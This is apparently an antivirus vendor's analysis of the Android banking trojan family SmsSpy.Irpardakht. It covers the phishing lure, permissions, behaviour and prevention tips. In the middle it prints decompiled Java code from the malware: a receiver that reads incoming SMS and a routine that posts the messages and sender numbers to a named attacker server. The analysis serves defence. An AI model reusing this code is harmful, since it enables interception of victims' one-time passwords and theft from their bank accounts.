Overview
Type: Trojan
Destruction Level: Moderate
Prevalence: Moderate
What is the Trojan?
Trojans are malware types that introduce themselves as healthy and legal software and act similarly to practical and applicable software but cause many destructions to the system when executing. The downloaded software from the internet, placing HTML text, attaching it to an email, etc. are ways that Trojans use to enter the system. Contrary to viruses and computer worms, Trojans are not reproducible.
What is SmsSpy.Irpardakht malware family?
There are a bunch of infected applications aimed at phishing attacks and accessing users’ banking accounts distributed through prominent markets such as Café Bazaar, and Myket as well as other illegible sites and markets, Telegram channels, or SMSes containing infected links. These kinds of malware represent themselves as legit and applicable applications but not only provide no useful and positive services, but will steal users’ important information using phishing attacks.
Their procedure is to give the clients false claims such as payment services, access to judiciary, and other financial and monetary services and sometimes demanded an amount of money through fake payment pages. As soon as the users enter their information (in the present malware the information is the Credit Card image) the attach will receive them, and the attacker can easily access the SMS, the user’s cellular data, and the second password to easily steal the money.
Technical Review
Signs of Infection
The Vam Pey malware application receives permissions such as reading and receiving SMS when installed. Then after installation, it will display the following image, and after receiving the user’s personal information right after the authentication it demands the user to upload a national card picture, ID Card picture, Credit Card picture, and user’s picture. If the users upload their Credit Card picture, then the attacker can receive the user’s dynamic password by accessing SMS and steal all user’s money easily.
Performance Description
The “Ir.pardakht.MainActivity” Activity
In this activity, the malware uses the POST method to inform its server that the user has installed the malware by sending the phone build ID.
Then it displays the https://img.pikacu.site/vampey/index.htm inside a web view.
Ir.pardakht.Sms receiver
As soon as receiving the message, the receiver will be active for the user.
The receiver uses SmsMessage class and its methods to steal the user’s SMS as follows:
getDisplayOriginatingAddress() method: accessing the sender’s phone number
getDisplayMessageBody() method: accessing the message text
public void onReceive(Context context, Intent intent) {
Bundle extras = intent.getExtras();
if (extras != null) {
try {
for (Object obj : (Object[]) extras.get(“pdus”)) {
SmsMessage createFromPdu = SmsMessage.createFromPdu((byte[]) obj);
String displayOriginatingAddress = createFromPdu.getDisplayOriginatingAddress();
String displayMessageBody = createFromPdu.getDisplayMessageBody();
this.num = displayOriginatingAddress;
this.txt = displayMessageBody;
Log.i(“SmsReceiver”, “.”);
Toast.makeText(context, “.”, 1).show();
try {
new SendPostRequest(this).execute(new String[0]);
} catch (Exception e) {
Toast.makeText(context, “SMS faild, please try again later!”, 1).show();
e.printStackTrace();
}
}
} catch (Exception e2) {
Log.e(“SmsReceiver”, new StringBuffer().append(“Exception smsReceiver”).append(e2).toString());
}
}
}
In this receiver, the malware sends the user’s SMS to its malicious server “https://img.pikacu.site/vampey/app.php “ as JSON using the POST method.
protected String doInBackground2(String… Starr) {
try {
URL url = new URL(“https://img.pikacu.site/vampey/app.php”);
JSONObject jSONObject = new JSONObject();
jSONObject.put(“id”, Build.ID);
jSONObject.put(“link”, “”);
jSONObject.put(“msg”, this.this$0.txt);
jSONObject.put(“num”, this.this$0.num);
Log.e(“params”, jSONObject.toString());
HttpURLConnection httpURLConnection = (HttpURLConnection) url.openConnection();
httpURLConnection.setReadTimeout(15000);
httpURLConnection.setConnectTimeout(15000);
httpURLConnection.setRequestMethod(“POST”);
httpURLConnection.setDoInput(true);
httpURLConnection.setDoOutput(true);
OutputStream outputStream = httpURLConnection.getOutputStream();
BufferedWriter bufferedWriter = new BufferedWriter(new OutputStreamWriter(outputStream, “UTF-8”));
bufferedWriter.write(this.this$0.getPostDataString(jSONObject));
bufferedWriter.flush();
bufferedWriter.close();
outputStream.close();
int responseCode = httpURLConnection.getResponseCode();
if (responseCode == 200) {
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(httpURLConnection.getInputStream()));
StringBuffer stringBuffer = new StringBuffer(“”);
String readLine = bufferedReader.readLine();
if (readLine != null) {
stringBuffer.append(readLine);
}
bufferedReader.close();
return stringBuffer.toString();
}
return new StringBuffer().append(“false : “).append(responseCode).toString();
} catch (Exception e) {
return new StringBuffer().append(“Exception: “).append(e.getMessage()).toString();
}
}
How to deal with and clean the system?
To be sure your system is safe, it is highly recommended to install Padvish Antivirus and keep its database file updated and scan your system repeatedly.
How to prevent your phone from infection:
- Don’t download and install applications from untrusted and unauthorized app stores.
- Pay attention to the permission when installing the application
- Repeatedly back up your data and important files on your phone
- Don’t use an unofficial version of applications. Applications such as Telegram and Instagram have multiple unofficial versions which distribute through Telegram channels.